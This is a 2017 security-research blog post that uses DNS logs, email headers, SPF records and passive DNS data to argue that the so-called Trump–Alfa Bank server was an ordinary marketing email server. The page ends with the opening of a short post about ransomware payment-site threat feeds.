DeepEnd Research

Monday, March 20, 2017

Analysis of Trump's secret server story

The debunkings will continue...

The news of Trump's server making interesting outbound connections caught attention of many security researchers in October 2016 and many of us, nerds, spent at least some time checking IP addresses, domains and looking at the logs.

However, the logs that were kindly shared by Jean Camp brought more questions than answers. For example, we see a bunch of DNS lookups for the A records of MAIL1.TRUMP-EMAIL.COM , but not much more that would support the claims of the secret communications. A number of researchers looked at it and wrote detailed explanations of why it is just a marketing email server, unlikely to be used for clandestine communications, and why the DNS log correlation with the political events seems very circumstantial. The fact that there was not enough information to make a final conclusion allowed that story to simmer until it flared up again in March, 2017 when Trump made allegations about the Trump tower wiretapping.

The reason we are raising this story from the dead again is to provide additional evidence that the "Trump's server" used to be a marketing email server. We also offer our possible explanations to some of the events and question some premises and assumptions of the original disclosure. We may repeat a lot of good points made by Krypt3ia and Errata Security in order to turn this collection of events into to a more cohesive narrative.

Disclaimer: We analyzed the email messages, the leaked logs, public DNS and IP information. We seek technical correctness and will welcome additional data. Conclusions that were made in this article were not driven by political opinions, we did not vote for Trump and do not have any interests in Alfa Bank. If you find technical or factual errors, please let us know in comments or email.

Examples of emails sent from the server in 2011-2016

The samples of email messages below show that the server was used for sending newsletter offers for at least 5 years and likely longer. We have a number of samples and mail logs of spam messages dated March 7, 2011-February 29, 2016. Please see below the email screenshots, list of subjects along with the partial string from each header, headers and screenshots of two messages.

Examples of marketing emails from March 7, 2011 to Feb 29.2016

Variety of emails received
from MAIL1.TRUMP-EMAIL.COM
2011-2016

First message sample
available date: Mar.7, 2011

Last message available dated:
Feb. 29, 2016

Raw email header of last email
avail. Feb. 29, 2016

Before we go into technical details, here is a list of points in a Q&A form.

Q: Did Trump or his associates communicate with the Russian bank via his server?

A: The messages were sent from one DNS server (Alfa Bank) to another DNS server (Cendyn) asking for the IP address of mail1.trump-email.com. The leaked logs that contain these queries do not give enough data to substantiate such claims.

Listrak Conf. Booth

Q:     Does that prove <insert anything related to Trump's claims about wiretapping, Russian computer hacking, Russian ties, etc?
A: Despite various wild theories, the events described in the original post and the logs have no relation to the Trump's claims that his wires were ~~crossed~~ tapped. This post does not prove that he "has" or "has no" other connections to Russia or anything about Russian hacking or other foreign entities. "The server " has never been the primary reason for the listed allegations.

Q: Can that server in Trump tower be possibly bugged by Obama, the British or hacked by
someone who wants to accuse the president in communications with Russia.
A:   "That server" is the same server we are talking about and it is not in the Trump tower. The server mail1.trump-email.com 66.216.133.29 was located in the Lititz, PA datacenter of a reputable digital marketing company Listrak contracted by Cendyn. Currently, the server with the IP address 66.216.133.29 is still in the datacenter and will be recycled for other needs. MAIL1.TRUMP-EMAIL.COM is pointing to a GoDaddy domain parking IP address (no actual server). TRUMP1.CONTACT-CLIENT.COM is still pointing to 66.216.133.29.

Q:   So, what happened then?
A:

Mail flow before March 2016

From at least 2011 to March, 2016, Alfa Bank employees and many other recipients around the world received so called marketing emails (aka spam) from Trump Organization sent from MAIL1.TRUMP-EMAIL.COM. Digital marketing companies Cendyn and Listrak who provided the mailing services used their mail and DNS servers in Pennsylvania and Florida. Cendyn registered that domain for the Trump Organization, which already owns over 3500 domains (src. Domaintools). None of the servers were ever physically in the Trump's Tower.

In March 2016, Trump Organization changed the vendor and stopped using Cendyn's services. Since at least May 4, 2016 (earliest date in the logs), at least some of the companies that we believe received Trump spam in the past continued to make DNS lookup requests for IP address of MAIL1.TRUMP-EMAIL.COM. Alfa Bank and Spectrum Health made many more lookups than others. Other IP addresses belong to a quarantine appliance run by an Anti-Spam cloud filtering provider MailCleaner, eCommerce Corporation mail service, Australian company called Shiftcare (software for home care services), Hostedmail.com, DNS server for small business hosting.
They did not directly connect to MAIL1.TRUMP-EMAIL.COM. In addition, it is believed many other companies were seen by various ISP providers doing similar lookups.

DNS Lookups as seen in the logs until September 23, 2016
The circle "Logs that leaked" shows the conversation content
in the logs. This does not imply that the logs were stolen from
Cendyn's ns[1-3].cdcservices.com as this is not the only
source where they could come from.
There are concerns about the source of the logs

The logs span the period from May 4, 2016 to Sept. 23 2016 and contain DNS lookup requests made by Alfa Bank's DNS servers and the companies mentioned. Some IP addresses in the logs are not actual DNS servers but gateway IP addresses for those networks.

Alfa Bank and other companies made daily (1-70+ a day) queries / DNS lookups asking for the IP address of MAIL1.TRUMP-EMAIL.COM that sent those spam emails, as seen in the email headers below.

Received: from mail1.trump-email.com ([66.216.133.29])
by <redacted> with ESMTP; 14 Jun 2013 11:19:11 -0400
DKIM-Signature: v=1; a=rsa-sha1; c=relaxed/relaxed; s=key1; d=contact-client.com;
h=List-Unsubscribe:MIME-Version:From:To:Reply-To:Date:Subject:Content-Type:Content-Transfer-Encoding:Message-ID; i=trumphotels@contact-client.com;
...
Received: by mail1.trump-email.com id hncq6u17vn06 for <redacted@redacted.com>; Fri, 14 Jun 2013 11:19:11 -0400 (envelope-from <839CBA2F17SGIAGALHHU5NQ418SP0I4GT7UPH1TKPRC0H2NP5PDVI2JEG27M8MJ@b.contact-client.com>)
List-Unsubscribe: <mailto:IM2GHO7PREI9U5V5SNNF83BLRHTO1UL966FONR690AG1N73O80JKU740V7EQIQ4G@b.contact-client.com>

These DNS lookups for domains and IPs inside messages that are not incoming but already delivered may be caused by any of the following: misconfigurations or glitches on email and mail filtering services, security appliances performing automated or search triggered lookups (DNS lookups on existing blacklists etc.), anti-spam mailbox store rescans, and endpoint level anti-spam products.
For example, anti-spam systems are known to try to resolve and lookup every IP address and DNS name in the email message header, which can sometimes trigger unintended unsubscribe actions. For example, IETF Request for Comments RFC8058 "Signaling One-Click Functionality for List Email Headers" released in Jan. 2017 specifies rules for the broadcast marketing companies to help cope with unintended unsubscribe actions caused by anti-spam systems.

The exact reason for lookups can be only guessed, since only the companies themselves would be able to tell which of their systems caused it, assuming enough associated internal logs were saved to correlate. The reasons could be different for all companies - some of them made lookups for LINKS.TRUMP-EMAIL.COM as all URLs in the emails used that subdomain. You can see example of those links in the header examples and in these Tweetbot posts.

On September 21, Alfa bank was reached for comments about the logs, which caused the number of lookups and their variety skyrocket as their security team started the investigation.

The author of the original disclosure states that the lookup errors started on September 22, 2016 because Cendyn removed the DNS zone for mail1.trump-email.com from ns1 and ns3.cdcservices.com. These were two Cendyn DNS servers in Ft.Lauderdale, FL. The second, ns2.cdcservices.com, is located in Boca Raton, Fl. Considering that Trump was not their client since March 2016, the hasty and belated removal was either co-incidence or reaction to being notified and realizing that the zone, or domain should have been removed long ago.

Passive DNS logs show only when the subdomain is first seen, not when created or assigned. The fact that TRUMP1.CONTACT-CLIENT.COM showed up in the passive DNS logs on Sept. 30 could be attributed to testing if the server is reachable using the new (or existing) freebie domain (Cendyn creates them for each customer), especially if they indeed still used it for CRM software that "CenDyn provides to the Trump Organization".

On September 27, Alfa Bank made a DNS request for the new TRUMP1.CONTACT-CLIENT.COM. Considering, that at that time the computer security department was performing investigation of the claims, it is not surprising. The domain was likely coaxed by various lookups and queries performed by their IT department. For example, you can see sudden appearance of queries for MAIL.TRUMP-EMAIL.COM (Mail without 1) from Alfa Bank 217.12.96.15 on September 22, which can be attributed to the investigation too.

Q: Did you see Alfa Bank's statement on March 17, 2017 that they were hacked and thus those connections to the Trump's server were made by hackers to look like Alfa Bank did it. (src. Circa)

A: It is possible to send a lot of DNS traffic, or other requests and perform an attack (DDoS or other) without actually "hacking" the victim. They were not "hacked" in this particular case, in the sense of someone infiltrating their network, nor do they say that. Alfa Bank received a lot of DNS queries and DNS replies to spoofed requests after the news came out. We are sure that many of those requests are the result of various researchers trying things. 1340 DNS queries is not a large number. And no, we didn't do it.

While it is possible to spoof DNS requests and make them look like they came from Alfa Bank, it is not a convincing theory for events before September 23, 2016. From the logs provided, there were 7 other companies seen over the course of 4.5 months doing the same type of lookups.

We think the DNS spoofing attacks that happened in 2017 as reported by Alfa Bank were spurred by all the news about the mysterious DNS communications channel used by Trump and Russians. Many researchers and hackers would try all kinds of queries to elicit server responses and some possibly tried to make it look like the 'secret' communications continue. The evidence of those research efforts can be seen on the Farsight pDNS search for TRUMP-EMAIL.COM, where some recent entries include 'new' subdomains like you see below. The cause for these is the fact that TRUMP-EMAIL.COM uses a wildcard DNS record, so queries for its random subdomains will resolve successfully and show up in the database (if seen by any pDNS sensors).

last seen	2017-03-17 21:18:09 -0000
`thej35t3rpwns.trump-email.com.`	`A`	`184.168.221.46`

We should note that Cendyn transferred the TRUMP-EMAIL.COM domain to Trump Organization on March 8, 2017, thus all attempts to resolve the domain since that date would return the IP address of GoDaddy domain parking server.

Claims and Counterclaims:

Before May 2016:

Claim 1:
Trump campaign press secretary Hope Hicks: “First of all, it’s not a secret server. The email server, set up for marketing purposes and operated by a third-party, has not been used since 2010. The current traffic on the server from Alphabank’s [sic] IP address is regular DNS server traffic – not email traffic.” (Src. Guardian)

Response 1:

As you see in the last message header As you see in the last message header here, the last message was received from that server MAIL1.TRUMP-EMAIL.COM on the IP address 66.216.133.29, the last message was received from that server MAIL1.TRUMP-EMAIL.COM on 66.216.133.29 on February 29, 2016.(src. DeepEnd Research)

This tweetbot was still posting links from Trump Hotel's marketing emails in February with the last one on Feb. 29, 2016 (src. Twitter)

Cendyn acknowledged that the last marketing email it delivered for Trump's corporation was sent in March 2016" (Src. CNN)

May 2016 - September 23, 2016. Logs and log time period:

Claim 2:
Trump and Russia’s largest private bank communicated via a hidden server since at least 2016 May. (src. GDD)

Response 2: Not hidden and did not communicate intentionally

As it was already pointed out by many, the sever is located in a server farm that belongs to a hosting company and is one of many used by Cendyn (the company used by Trump Organization for mailing services). It is not more hidden than any server of any cloud services provider.

Subdomains of
CONTACT-CLIENT.COM

You can see other servers with similar domain names registered by Cendyn in this 66.216.133.0/24 range (src. Hurricane Electric) and check out the domain siblings (Sibling domains are subdomains that share a common suffix which is not a public suffix. ) (src. Virustotal pDNS).

A long list of subdomains of CONTACT-CLIENT.COM shows other clients on Cendyn with similar domains. (see Virustotal pDNS Contact-client.com subdomains)

"The RData for this host were served by the Central Dynamics (CC-801) authority resolvers ns{1,2,3}.cdcservices.com."(src. GDD) < Central Dynamics (Cendyn) maintained DNS records for the domain just like they do for other customers and other domains they registered and maintained for Trump were:

TRUMP1.CONTACT-CLIENT.COM 66.216.133.29 (Cendyn's range)

TRUMP.MLINKS.CONTACT-CLIENT.COM 168.235.224.14 (Cendyn's range)

TRUMP.TRANSACTIONAL.CONTACT-CLIENT.COM 64.135.26.234 (Cendyn's range)

TRUMP.MARKETING.CONTACT-CLIENT.COM 64.135.26.234 (Cendyn's range)

MAIL1.TRUMP-EMAIL.COM 66.216.133.29 (now is on 184.168.221.46 - GoDaddy dn parking)

LINKS.TRUMP-EMAIL.COM CNAME customers.listrak.com (now is on 184.168.221.46 - GoDaddy domain parking)

Claim 3:
"Trump’s host mail1.trump-email.com operated a Listrak virtual mail transfer agent outside the SPF sending range, configured for outbound delivery. "(src. GDD and Slate)

"The scientists theorized that the Trump and Alfa Bank servers had a secretive relationship after testing the behavior of mail1.trump-email.com using sites like Pingability. When they attempted to ping the site, they received the message “521 lvpmta14.lstrk.net does not accept mail from you.” (src. LJean.com)

Response 3:

Robert Graham from Errata Security already explained that this is how Listrak configures email marketing servers. (src. Errata Security).

As for "outside of SPF range", Cendyn's SPF records for TRUMP-EMAIL.COM and CONTACT-CLIENT.COM (envelope sender) included MX, which is the same for all their domains - incoming.cdcservices.com . MX entry in SPF records makes it unnecessary to list all the IPs. The only downside and limitation about using MX entry instead of IPs is that it works only for servers that only do sending, not receiving - which is what that server was built to do. See the header here and note that Received-SPF: pass

SPF records for TRUMP-EMAIL.COM: first seen 2014-11-14 11:17:46 -0000last seen 2016-09-23 12:59:33 -0000trump-email.com. TXT "Internet Solution from Cendyn.com."
trump-email.com. TXT "v=spf1 ip4:198.91.42.0/23 ip4:64.135.26.0/24 ip4:64.95.241.0/24 ip4:206.191.130.0/24 ip4:63.251.151.0/24 ip4:69.25.15.0/24 mx ~all"
SPF check from email header:Received-SPF: pass (google.com: domain of H46ERELB4L1O917PENAM0QLOBKO2PO7OTETRAA30GQDB7GOSSGRVKCR5AKPE3C9@b.contact-client.com designates 66.216.133.29 as permitted sender) client-ip=66.216.133.29;

Claim 4:
"Since May of 2016 only two networks resolved the mail1.trump-email.com host, AS15632 (JSC Alfa-Bank) and AS30710 (Spectrum Health). Alfa Bank is Russia’s largest bank and Spectrum Health is a integrated, managed care health care organization in Michigan."(src. GDD)

Response 4:

The logs show more than two companies (src. LJean.com)

Other companies that are not shown in the logs also made such queries (src. Twitter - via Errata Security)

Robert Graham has covered that topic. (src. Errata Security)

Claim 5:
Spikes in the communications correlate with the political events in the Summer of 2016 .(src. GDD)

Response 5:

Some spikes correlate and others don't.

Robert Graham has covered that topic. (src. Errata Security)

Claim 6:

"Strange combined domain name (mail.trump-email.com.moscow.alfaintra.net) seen in Alfa Bank logs mean "Moscow division of the INTERNAL Alfa Bank network most definitely has purposeful communications with a hostname registered by the Trump Organization. "(src. LJean.com)

Response 6:

It is normal Windows behavior. Look for Primary DNS and DNS suffix topics. Robert Graham already covered it. (src. Errata Security)

Claim 7:

Cendyn headquarters

IP address 66.216.133.29 doesn't appear on spam blocklists thus unlikely to be a spam server (src. LJean.com)

Response 7:

Cendyn is a marketing company, they do their best to avoid being blacklisted as it would undermine their business.

Robert Graham already covered it. (src. Errata Security)

Claim 8:
CenDyn stated the reason they recreated a trump1.contact-client.com hostname pointing to this same IP address was for the Trump Organization to use the CRM software CenDyn provides to the Trump Organization." (src. LJean.com)

Response 8:

It is possible they needed to use TRUMP1.CONTACT-CLIENT.COM after they removed EMAIL1.TRUMP-EMAIL.COM We do not know when it happened. We know when TRUMP1.CONTACT-CLIENT.COM showed up in the DNS logs and passive DNS database, but it is not a direct evidence of the creation and assignment date.

Claim 9:
"CenDyn states that their servers are not dedicated to a specific client. Yet the Internet-Wide Scan Data Repository (scans.io) data show that the hostname mail1.Trump-Email.com has been stable since at least 2013. It did not change for three years, then did change on on 23 September 2016. At the time of this writing, 2 October 2016, no other hostname has pointed to this IP 66.216.133.29:just trump1.contact-client.com and mail1.trump-email.com. So this IP address is associated with only that server. " (src. LJean.com)

Response 9:

This is correct. It appears that 66.216.133.29 was dedicated to Trump Organization. PTR records are still not updated.

first seen 2010-07-02 19:20:22 -0000
last seen 2016-09-13 01:47:56 -0000
mail1.trump-email.com. A 66.216.133.29

first seen 2017-03-08 04:32:26 -0000
last seen 2017-03-19 17:41:34 -0000
mail1.trump-email.com. A 184.168.221.46 < now

Reverse DNS

Rdata results for ANY/ 66.216.133.29
mail1.trump-email.com. A 66.216.133.29
trump1.contact-client.com. A 66.216.133.29

Claim 10:
DNS was possibly used to conceal data and commands within DNS traffic using the technique called DNS tunneling (as many ask on Twitter)

Response 10:

It does not seem to be the case, if based on the provided logs. They show "A" records only. "A" records are used for transferring only IP addresses. DNS tunneling would be possible if those were "TXT" or "CNAME" type records that can hold arbitrary non-formatted text strings. (Tunneling Data and Commands Over DNS to Bypass Firewalls by Lenny Zeltser)

September 21, 2016 - October 5, 2016 As requests for comments were sent to Alfa Bank

Claim 11:"When a reporter called Alfa Bank for comment on September 21, the zone for mail1.trump-email.com was removed from ns1 and ns3.cdcservices.com causing RCODE=2 (Server Failure), and ns2 returned empty referrals"(src. GDD)
"One of the intriguing facts in my original piece was that the Trump server was shut down on Sept. 23, two days after the New York Times made inquiries to Alfa Bank (and a week before the Times reached out to Trump)." (src. Slate)

Trump, CenDyn or some other party associated with the domain sought to erase the mail1.Trump-Emal.com host by deleting forward resolution zones. So the domain name was removed from the normal way one would look up a domain. However, the reverse delegation still exists as of 2 November 2016." (src. LJean.com)

Response 11:

The server as machine on 66.216.133.29 in the Listrak datacenter is still up so it was not shut down.
Passive DNS shows that "A" record MAIL1.TRUMP-EMAIL.COM was last seen on 66.216.133.29 on 2016-09-13. Since Trump company 'ditched' Cendyn in March 2016, eventual cleanup of DNS records had to happen - eventually. We don't know if they were contacted regarding the matter on or before September 22, 2016. If they were, it would be a normal knee-jerk reaction to the inquiry.
They removed records only from the Ft. Lauderdale servers (NS1 and NS3) but not NS2 in Boca Raton (different admins?). It was noted by many that they also forgot to remove PTR record for mail1.trump-email.com and it is still pointing to 66.216.133.29 even though A record was finally assigned to GoDaddy domain parking 184.168.221.22 on March 8, 2017 (after transferring domain back to Trump org).

Claim 12: "Alfa Bank knew that Trump renamed his host through ongoing email delivery and HELO/EHLO resolutions, or another channel. Trump and Alfa Bank have since coordinated their move to an office communications channel." (src. GDD)

Response 12:

Not sure what the author means by "an office communications channel". The requests for comments for the Alfa Bank were made on September 21, 2016. On September 27, 2016 the Alfa bank DNS server made a lookup for TRUMP1.CONTACT-CLIENT.COM. Considering that they did their investigation of the claims, it is not unexpected that their security people finally found and queried the other domain associated with the IP.

Claim 13: "The hostname trump1.contact-client.com appeared in the first passive DNS

Over 500 subdomains.
via PassiveTotal pDNS

database three days later, and still has not appeared in some passive collections." (src. GDD)

Response 13:

Passive DNS collections are passive. They see a lot but not every successful resolution on the web. (see more at PassiveTotal FAQ or Farsight pDNS FAQ )

October 5, 2016 - March 8, 2017 Post-Disclosure

Claim 14:
In March 2016, Cendyn said it "transferred back to" Trump's company the mail1.trump-email.com domain. (Src. CNN)

Response 14:

Yes, they did transfer the domain control on 2017-03-08. Since then, MAIL1.TRUMP-EMAIL.COM and all subdomains resolve to 184.168.221.46 - GoDaddy Parking (IP address for domains without associated hosting servers)

Claim 15:
Alfa Bank claims that the recent attacks in February and March 2017 are intended to make it look they continue the secret communications with the Trump server.

Response 15:

2017-02-17 According to the Alfa Bank press release on 2017-03-17, on 2017-02-17 computers in USA sent requests to "Trump Organization server" and made it look like it came "from various variants of MOSCow.ALFAintRa.nET", thus the "Trump's server's" replies were sent to Alfa bank.(src. Alfa Bank and Circa).

The press releases often go through several layers of editing which could affect the technical accuracy of the text. For example, here we can assume that by the Trump Organization server they mean Cendyn's DNS server for MAIL1.TRUMP-EMAIL.COM and that server received DNS queries for MAIL1.TRUMP-EMAIL.COM that came from Alfa Bank spoofed IP addresses. DNS servers do not record domain names of incoming requestors, so it is not entirely clear where they saw MOSCow.ALFAintRa.nET. Not questioning the fact of the attack but it is hard to say what happened without actual logs or more technical data.

2017-03-11 and 2017-03-13 According to the Alfa Bank press release on 2017-03-17, on 2017-03-11 and 2017-03-13 their systems received 1340 DNS replies to the queries they did not send for mail.trump-email.com.moscow.alfaintra.net.(src. Alfa Bank and Circa)

Again, it looks like press release is lacking technical accuracy, which is ok.
In general, sending DNS request from spoofed IP addresses (crafted packets) is very easy. Often attackers use nonexistent subdomains to force their recursive DNS server to forward each of their queries to the authoritative DNS server for that domain instead of using cached answers, thus overloading it. DDoS does not seem to be the goal but more like malicious experimenting.

Claim 16:

But experts claim it is <unusual, odd.. etc>

Response 16:

In tech speak, epithets like "odd", "weird", "not normal" do not really mean clandestine or paranormal. These are highly technical terms meant to convey that existing evidence is too limited to allow one extrapolate the possible scenarios. I am not speaking for every comment out there but am suggesting not to jump to conclusions when a nerd calls something "odd".
Robert Graham comments on the experts' claims too (src. Errata Security)

Timeline of events 2007 - 2017

It would be beneficial, I think, to establish a timeline of the events that you see below and we will go over the milestones below.

Timeline of events February 2016 - March 2017

References for the timeline

2007-06-21 Cendyn is chosen as a marketing vendor for Trump Hotels (src. Prnewswire)
2009-08-14 TRUMP-EMAIL.COM registered by sl.admin@cendyn.com (src. Domaintools.com)
2010 Last time, according to Hope Hicks (White House) when MAIL1.TRUMP-EMAIL.COM on 66.216.133.29 was used by Trump (src. The Guardian)
2011-03-07 Email header of a message sent on March 7, 2011 (Src. DeepEnd Res)
2016-March Last time the server was used to send emails, according to Cendyn (src. CNN)
2016-05-04 First time stamp in the leaked logs
2016-07 Tea Leaves researches logs and shares data with computer experts
2016-09-13 Last time MAIL1.TRUMP-EMAIL.COM A record was seen by pDNS on 66.216.133.29
2016-09-23 Last timestamp in the leaked logs
2016-09-21 Alfa Bank were contacted for comments
2016-09-22 DNS Errors on trump-email.com
2016-09-23 DNS Errors on trump-email.com
2016-09-23 Alfa Bank 217.12.97.15 and 217.12.97.137 make DNS A record queries for MAIL.TRUMP-EMAIL.COM (mail without 1) that is on 198.91.42.236 (src. leaked logs)
2016-09-23 Three CNAME and A queries for (pseudo?)random subdomain of trump-email.com get registered by pDNS
2016-09-27 Alfa Bank 217.12.97.15 makes a DNS A record query for TRUMP1.CONTACT-CLIENT.COM
2016-09-30 TRUMP1.CONTACT-CLIENT.COM first seen by Farsight pDNS on 66.216.133.29
2016-10-03 TRUMP1.CONTACT-CLIENT.COM first seen by Virustotal pDNS on 66.216.133.29
2016-10-03 TRUMP1.CONTACT-CLIENT.COM first seen by PassiveTotal pDNS on 66.216.133.29
2016-10-05 GDD53 publishes the original article Trump’s Russian Bank Account
2017-02-17 According to the Alfa Bank press release on 2017-03-17, computers in USA sent requests to "Trump Organization server" and made it look like it came "from MOSCow.ALFAintRa.nET", thus the "Trump's server's" replies were sent to Alfa bank.(src. Alfa Bank and Circle)
2017-03-08 TRUMP-EMAIL.COM was transferred by Cendyn to "Registrant Organization: Trump Orgainzation Registrant Street: 725 Fifth Avenue Registrant City: New York"
2017-03-04 - 29.133.216.66.in-addr.arpa. PTR for MAIL1.TRUMP-EMAIL.COM last seen on 66.216.133.2 (via dig -x)
2017-03-11 and 2017-03-13 According to the Alfa Bank press release on 2017-03-17, their systems received 1340 DNS replies to the queries they did not send for mail.trump-email.com.moscow.alfaintra.net.(src. Alfa Bank and Circle)

Previous Reports and Research

2016-10-05 Tea Leaves GDD53 Trump’s Russian Bank Account
2016-10 DNS logs Jean Camp Transparent Network data
2016-10-05 Krypt3ia GDD53: A Russian Hosted i2p Site That Claims Trump’s Email System Had Ties To Alfabank (Russia)
2016-10-31 Slate Was a Trump Server Communicating With Russia?
2016-11-01 Krypt3ia Shits Gone Plaid: GDD53 and Slate
2016-11-01 Errata Security Debunking Trump's "secret server"
2016-11-03 Errata Security In which I have to debunk a second time
2016-11-01 Washington Post That secret Trump-Russia email server link is likely neither secret nor a Trump-Russia link
2016-11-01 The Intercept Here is a problem with the story connecting Russia to Donald Trump's Email
2016-11-02 Slate. Trump’s Server, Revisited
2017-03-10 CNN Sources: FBI investigation continues into 'odd' computer link between Russian bank and Trump Organization
2017-03 Snopes (Unproven) Trump Organization Computer Server Tied to Russian Bank?
2017-03-17 Alfa Bank. Заявление для прессы
2017-03-17 Circa. Russian bank tells DOJ mysterious Trump computer connections may have been hacker hoax

-->https://www.dnsdb.info/#Search_rrset_ANY_*.trump-email.com.courtesy of Farsight Security pDNS

bailiwick	com.
count	2498
first seen in zone file	2010-04-24 16:12:21 -0000
last seen in zone file	2017-03-07 17:02:37 -0000
`trump-email.com.`	`NS`	`ns1.cdcservices.com.`
`trump-email.com.`	`NS`	`ns2.cdcservices.com.`
`trump-email.com.`	`NS`	`ns3.cdcservices.com.`

bailiwick	com.
count	9
first seen in zone file	2017-03-08 17:02:36 -0000
last seen in zone file	2017-03-16 16:02:32 -0000
`trump-email.com.`	`NS`	`ns33.domaincontrol.com.`
`trump-email.com.`	`NS`	`ns34.domaincontrol.com.`

bailiwick	trump-email.com.
count	69
first seen	2017-03-08 02:52:17 -0000
last seen	2017-03-17 21:39:58 -0000
`trump-email.com.`	`A`	`184.168.221.46`

bailiwick	com.
count	84316
first seen	2010-07-02 19:20:21 -0000
last seen	2017-03-08 01:43:28 -0000
`trump-email.com.`	`NS`	`ns1.cdcservices.com.`
`trump-email.com.`	`NS`	`ns2.cdcservices.com.`
`trump-email.com.`	`NS`	`ns3.cdcservices.com.`

bailiwick	com.
count	292
first seen	2017-03-08 02:52:17 -0000
last seen	2017-03-17 14:31:14 -0000
`trump-email.com.`	`NS`	`ns33.domaincontrol.com.`
`trump-email.com.`	`NS`	`ns34.domaincontrol.com.`

bailiwick	trump-email.com.
count	6251
first seen	2010-07-23 05:00:14 -0000
last seen	2016-09-23 08:36:45 -0000
`trump-email.com.`	`NS`	`ns1.cdcservices.com.`
`trump-email.com.`	`NS`	`ns2.cdcservices.com.`
`trump-email.com.`	`NS`	`ns3.cdcservices.com.`

bailiwick	trump-email.com.
count	166
first seen	2017-03-08 02:52:17 -0000
last seen	2017-03-18 02:23:26 -0000
`trump-email.com.`	`NS`	`ns33.domaincontrol.com.`
`trump-email.com.`	`NS`	`ns34.domaincontrol.com.`

bailiwick	trump-email.com.
count	113
first seen	2017-03-08 04:25:30 -0000
last seen	2017-03-17 21:40:00 -0000
`trump-email.com.`	`SOA`	`ns33.domaincontrol.com. dns.jomax.net. 2017030700 28800 7200 604800 600`

bailiwick	trump-email.com.
count	10
first seen	2014-11-02 07:51:23 -0000
last seen	2014-11-18 11:50:25 -0000
`trump-email.com.`	`SOA`	`ns1.cdcservices.com. postmaster.centralservices.local. 2012062509 1200 120 1209600 3600`

bailiwick	trump-email.com.
count	2106
first seen	2014-12-04 23:24:31 -0000
last seen	2016-09-23 13:47:43 -0000
`trump-email.com.`	`SOA`	`ns1.cdcservices.com. postmaster.centralservices.local. 2012062510 1200 120 1209600 3600`

bailiwick	trump-email.com.
count	1
first seen	2011-09-13 21:38:59 -0000
last seen	2011-09-13 21:38:59 -0000
`trump-email.com.`	`MX`	`10 mx20.cdcservices.com.`
`trump-email.com.`	`MX`	`20 mx21.cdcservices.com.`

bailiwick	trump-email.com.
count	18
first seen	2017-03-11 03:22:33 -0000
last seen	2017-03-17 21:40:00 -0000
`trump-email.com.`	`MX`	`0 smtp.secureserver.net.`
`trump-email.com.`	`MX`	`10 mailstore1.secureserver.net.`

bailiwick	trump-email.com.
count	12
first seen	2011-12-14 22:04:06 -0000
last seen	2016-09-23 08:36:45 -0000
`trump-email.com.`	`MX`	`10 incoming.cdcservices.com.`

bailiwick	trump-email.com.
count	10
first seen	2014-11-14 11:17:46 -0000
last seen	2016-09-23 12:59:33 -0000
`trump-email.com.`	`TXT`	`"Internet Solution from Cendyn.com."`
`trump-email.com.`	`TXT`	`"v=spf1 ip4:198.91.42.0/23 ip4:64.135.26.0/24 ip4:64.95.241.0/24 ip4:206.191.130.0/24 ip4:63.251.151.0/24 ip4:69.25.15.0/24 mx ~all"`

bailiwick	trump-email.com.
count	17
first seen	2011-05-07 03:06:37 -0000
last seen	2017-03-10 05:43:42 -0000
`www.trump-email.com.`	`CNAME`	`trump-email.com.`

bailiwick	trump-email.com.
count	2
first seen	2017-03-10 15:46:36 -0000
last seen	2017-03-10 15:46:36 -0000
`mail.trump-email.com.`	`A`	`184.168.221.46`

bailiwick	trump-email.com.
count	4
first seen	2011-05-07 03:06:37 -0000
last seen	2016-09-23 12:10:41 -0000
`mail.trump-email.com.`	`CNAME`	`mx3.cdcservices.com.`

bailiwick	trump-email.com.
count	119
first seen	2012-12-19 15:37:59 -0000
last seen	2013-07-12 18:14:52 -0000
`_client._smtp.trump-email.com.`	`CNAME`	`trump-email.com.`

bailiwick	trump-email.com.
count	8
first seen	2017-03-08 23:40:31 -0000
last seen	2017-03-16 22:30:04 -0000
`links.trump-email.com.`	`A`	`184.168.221.46`

bailiwick	trump-email.com.
count	163659
first seen	2010-07-05 07:37:16 -0000
last seen	2016-09-22 19:45:03 -0000
`links.trump-email.com.`	`CNAME`	`customers.listrak.com.`

bailiwick	trump-email.com.
count	20608
first seen	2010-07-02 19:20:22 -0000
last seen	2016-09-13 01:47:56 -0000
`mail1.trump-email.com.`	`A`	`66.216.133.29`

bailiwick	trump-email.com.
count	57
first seen	2017-03-08 04:32:26 -0000
last seen	2017-03-17 00:15:59 -0000
`mail1.trump-email.com.`	`A`	`184.168.221.46`

bailiwick	trump-email.com.
count	2
first seen	2017-03-10 15:46:41 -0000
last seen	2017-03-10 15:46:41 -0000
`mail2.trump-email.com.`	`A`	`184.168.221.46`

bailiwick	trump-email.com.
count	1
first seen	2017-03-17 21:40:00 -0000
last seen	2017-03-17 21:40:00 -0000
`ctudgrekow.trump-email.com.`	`A`	`184.168.221.46`

bailiwick	trump-email.com.
count	2
first seen	2016-09-23 08:36:46 -0000
last seen	2016-09-23 08:36:46 -0000
`dw6w3yzfw6.trump-email.com.`	`CNAME`	`trump-email.com.`

bailiwick	trump-email.com.
count	5
first seen	2017-03-11 03:22:33 -0000
last seen	2017-03-11 03:22:33 -0000
`i6myzht210.trump-email.com.`	`A`	`184.168.221.46`

bailiwick	trump-email.com.
count	5
first seen	2017-03-15 22:45:24 -0000
last seen	2017-03-15 22:45:24 -0000
`k8v362jbh7.trump-email.com.`	`A`	`184.168.221.46`

bailiwick	trump-email.com.
count	2
first seen	2016-09-23 08:59:55 -0000
last seen	2016-09-23 08:59:55 -0000
`s4ddlkd49j.trump-email.com.`	`CNAME`	`trump-email.com.`

bailiwick	trump-email.com.
count	2
first seen	2016-09-23 08:56:36 -0000
last seen	2016-09-23 08:56:36 -0000
`t59hykhmfc.trump-email.com.`	`CNAME`	`trump-email.com.`

bailiwick	trump-email.com.
count	1
first seen	2017-03-17 21:18:09 -0000
last seen	2017-03-17 21:18:09 -0000
`thej35t3rpwns.trump-email.com.`	`A`	`184.168.221.46`

Returned 30 RRsets in 0.04 seconds.

Tuesday, January 10, 2017

Threat Intel - Ransomware Payment Sites Feed

There are a number of great sites dedicated to Ransom ware threat feeds. Those with the most value include the Download/Dropper site or the C2 Site.

These lists of observables can help Incident Response teams, by limiting the spread throughout their local environments.

Unfortunately though, malware authors will frequently slip in under the radar, and we find individual users try to rectify the problem on their own. They will visit the payment site and pay the ransom, which keeps IT Teams in the dark. Regardless of what side of the debate you're on, hiding the ransom payment makes it hard for teams to build counter measures or even understand they have a problem.

